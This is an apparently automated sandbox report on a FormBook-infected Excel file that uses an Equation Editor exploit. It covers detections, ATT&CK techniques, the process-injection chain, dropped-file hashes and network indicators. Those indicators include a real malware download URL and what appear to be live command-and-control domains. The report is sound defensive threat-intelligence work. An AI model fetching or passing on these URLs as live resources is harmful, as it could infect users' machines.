          Source: Yara match | File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 151 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 111 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 2 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Information Discovery 114 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph

          [Figure: behavior graph. Behavior Graph ID: 528788, Sample: New order - C.S.I No. 04183.xlsx, Startdate: 25/11/2021, Architecture: WINDOWS, Score: 100. Process chain: EQNEDT32.EXE started vbc.exe, which started a second vbc.exe, which injected into explorer.exe, which started cscript.exe, which started cmd.exe. EXCEL.EXE was started separately.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          New order - C.S.I No. 04183.xlsx | 36% | Virustotal |
          New order - C.S.I No. 04183.xlsx | 36% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll | 100% | Joe Sandbox ML |
          C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe | 100% | Joe Sandbox ML |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.vbc.exe.2980000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.cscript.exe.3e22f0.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
          5.0.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.vbc.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          5.0.vbc.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.cscript.exe.2a4f840.7.unpack | 100% | Avira | TR/Patched.Ren.Gen
          5.0.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.oojry.xyz | 3% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://www.crystalsbyzoe.com/og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN | 0% | Avira URL Cloud | safe
          http://103.171.1.140/384500000_1/.vbc.exe | 9% | Virustotal |
          http://103.171.1.140/384500000_1/.vbc.exe | 100% | Avira URL Cloud | malware
          http://java.sun.com | 0% | URL Reputation | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          www.celikkaya.xyz/og2w/ | 0% | Avira URL Cloud | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
          http://www.oojry.xyz/og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN | 100% | Avira URL Cloud | phishing

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com | 34.246.239.131 | true | false | - | high
          www.oojry.xyz | 104.21.82.75 | true | true | - | unknown
          www.crystalsbyzoe.com | unknown | unknown | true | - | unknown

              Contacted URLs

              Name | Malicious | Antivirus Detection | Reputation
              http://www.crystalsbyzoe.com/og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN | true | Avira URL Cloud: safe | unknown
              http://103.171.1.140/384500000_1/.vbc.exe | true | 9%, Virustotal; Avira URL Cloud: malware | unknown
              www.celikkaya.xyz/og2w/ | true | Avira URL Cloud: safe | low
              http://www.oojry.xyz/og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN | true | Avira URL Cloud: phishing | unknown

              URLs from Memory and Binaries


                                        Contacted IPs


                                        Public

                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                        103.171.1.140 | unknown | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true
                                        34.246.239.131 | dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
                                        104.21.82.75 | www.oojry.xyz | United States | 13335 | CLOUDFLARENETUS | true

                                        General Information

                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                        Analysis ID:528788
                                        Start date:25.11.2021
                                        Start time:19:22:14
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 9m 57s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:New order - C.S.I No. 04183.xlsx
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winXLSX@9/24@2/3
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 45.6% (good quality ratio 42.5%)
                                        • Quality average: 73.9%
                                        • Quality standard deviation: 30.5%
                                        HCA Information:
                                        • Successful, ratio: 92%
                                        • Number of executed functions: 86
                                        • Number of non-executed functions: 109
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .xlsx
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                        • Not all processes were analyzed; the report is missing behavior information

                                        Simulations

                                        Behavior and APIs

                                        Time | Type | Description
                                        19:23:36 | API Interceptor | 88x Sleep call for process: EQNEDT32.EXE modified
                                        19:23:44 | API Interceptor | 35x Sleep call for process: vbc.exe modified
                                        19:24:00 | API Interceptor | 211x Sleep call for process: cscript.exe modified
                                        19:24:55 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        Match | Associated Sample Name / URL | Detection | Context
                                        103.171.1.140 | PROFORMA INVOICE.xlsx | malicious | 103.171.1.140/4267111111_2/.vbc.exe
                                        103.171.1.140 | 0416ORTX20497421.xlsx | malicious | 103.171.1.140/76190111111_1/.vbc.exe
                                        103.171.1.140 | ShzuSh.xlsx | malicious | 103.171.1.140/x386w/.vbc.exe
                                        103.171.1.140 | 209673.xlsx | malicious | 103.171.1.140/774757m/.vbc.exe

                                        Domains


                                        ASN


                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:downloaded
                                        Size (bytes):475934
                                        Entropy (8bit):6.263679071719373
                                        Encrypted:false
                                        SSDEEP:6144:2Gi2L3NWrOG5s3ytYBz5Sy/M3L+uM4jMzfWO/j4zR03bze/XOpSmREM3:hUb5krzwR3LIfL4zq3baOEEz3
                                        MD5:4D1B51FE258BE32D346B3507ABEDDCB3
                                        SHA1:977A34967B0B42A19969DD1106EF74439D306DCE
                                        SHA-256:0C6D57557120DECEDC9A102794EA95BCAF64529EB1F18058E4DF62C34B724988
                                        SHA-512:27330F64606CFEBBE834E2D419E5F34207C1BFBBAE22DA52763C8FE8E48A001D52E2C5AB1B93EE9CFD2E5B4DF02C09628F82BE2CD5D340CA0711C004AED1EC12
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        IE Cache URL:http://103.171.1.140/384500000_1/.vbc.exe
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B711330.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):10202
                                        Entropy (8bit):7.870143202588524
                                        Encrypted:false
                                        SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                        MD5:66EF10508ED9AE9871D59F267FBE15AA
                                        SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                        SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                        SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BA6FB7C.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):19408
                                        Entropy (8bit):7.931403681362504
                                        Encrypted:false
                                        SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                        MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                        SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                        SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                        SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C56E6BA.emf
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Category:dropped
                                        Size (bytes):498420
                                        Entropy (8bit):0.6413582634752348
                                        Encrypted:false
                                        SSDEEP:384:mZIXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:moXwBkNWZ3cjvmWa+VDO
                                        MD5:1E7A8CBA90D89CD1D5710C1FF7FA77A7
                                        SHA1:CC5412614638647C010B300E0149777638DAF3D7
                                        SHA-256:64BDD89994D6E14E386C35BB48DA739AA156F2453B47F810EE4D51461723B12B
                                        SHA-512:E75011D87322A2111FF322AB4A98A1A55C68BB08E158D92834B0818EBA216C16A7373ECF7C28C9CCD5FE017E7E886C26532191AFAA80892EB5806930C6A8F28E
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5EF52A6.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):42465
                                        Entropy (8bit):7.979580180885764
                                        Encrypted:false
                                        SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                        MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                        SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                        SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                        SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\632450BE.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):68702
                                        Entropy (8bit):7.960564589117156
                                        Encrypted:false
                                        SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                        MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                        SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                        SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                        SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6391CDA7.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):14828
                                        Entropy (8bit):7.9434227607871355
                                        Encrypted:false
                                        SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                        MD5:58DD6AF7C438B638A88D107CC87009C7
                                        SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                        SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                        SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BBEB2B.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):6364
                                        Entropy (8bit):7.935202367366306
                                        Encrypted:false
                                        SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                        MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                        SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                        SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                        SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\881D373.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):11303
                                        Entropy (8bit):7.909402464702408
                                        Encrypted:false
                                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA4B566F.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):68702
                                        Entropy (8bit):7.960564589117156
                                        Encrypted:false
                                        SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                        MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                        SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                        SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                        SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF128ED8.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):6364
                                        Entropy (8bit):7.935202367366306
                                        Encrypted:false
                                        SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                        MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                        SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                        SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                        SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBF350F9.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):10202
                                        Entropy (8bit):7.870143202588524
                                        Encrypted:false
                                        SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                        MD5:66EF10508ED9AE9871D59F267FBE15AA
                                        SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                        SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                        SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB1A9DA4.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):14828
                                        Entropy (8bit):7.9434227607871355
                                        Encrypted:false
                                        SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                        MD5:58DD6AF7C438B638A88D107CC87009C7
                                        SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                        SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                        SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F02D5955.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):19408
                                        Entropy (8bit):7.931403681362504
                                        Encrypted:false
                                        SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                        MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                        SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                        SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                        SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2131971.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):42465
                                        Entropy (8bit):7.979580180885764
                                        Encrypted:false
                                        SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                        MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                        SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                        SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                        SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD326752.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):11303
                                        Entropy (8bit):7.909402464702408
                                        Encrypted:false
                                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):120832
                                        Entropy (8bit):6.282005604227144
                                        Encrypted:false
                                        SSDEEP:1536:QC73nuxwSHWtPMATKVLWKSg+ZuDZxinIKjyozssu03z+ICtrmlkx7SzmlonptA1q:ewqWtUpcU+Uin+ozvDGtN7su1fKuuJ
                                        MD5:CF3B520E83AF10CD581888715E23C700
                                        SHA1:A03E9DA020C79A0B110E05BB8CFFCAEC9275720B
                                        SHA-256:57E5B81AA1D1C628DD849E005E32B19A3DC3AF9E3F5797F5770AA2462D13B489
                                        SHA-512:A5E773947DE896269C9BA6E92731F69FBD3E5AF185A623321B3D98760F9C0287F92950E762C300AF498D9AB5F47D01ADC76B2C3CED2634F94DDFEB9C385D2C37
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        C:\Users\user\AppData\Local\Temp\y6piyw2sm9gz
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):216294
                                        Entropy (8bit):7.993636820458112
                                        Encrypted:true
                                        SSDEEP:6144:k6s9fJzSq1DVbiGQtqXsjh0xxYAUO/j4zRFWJl+:k6sLf1B6gsjh0xxYAJ4z/mk
                                        MD5:E76442BDF2DEBE302E1E2E2A90709AAE
                                        SHA1:9FD8EC630AE06DC5C09654237C97628F8822B902
                                        SHA-256:A44978D726C8B7792812E38267471DA5BC4D968944264E0F139EF1438133476F
                                        SHA-512:E45EDFDBE599321B7F46DBAAE242A7B179E09980EB3D89415456996368B454FEC1B4744DB906E5383A72112EE3CA421E81D771A7EE17B6FAE71BFE59320116A4
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Temp\~DF6B82F0CFA0E9C1FD.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
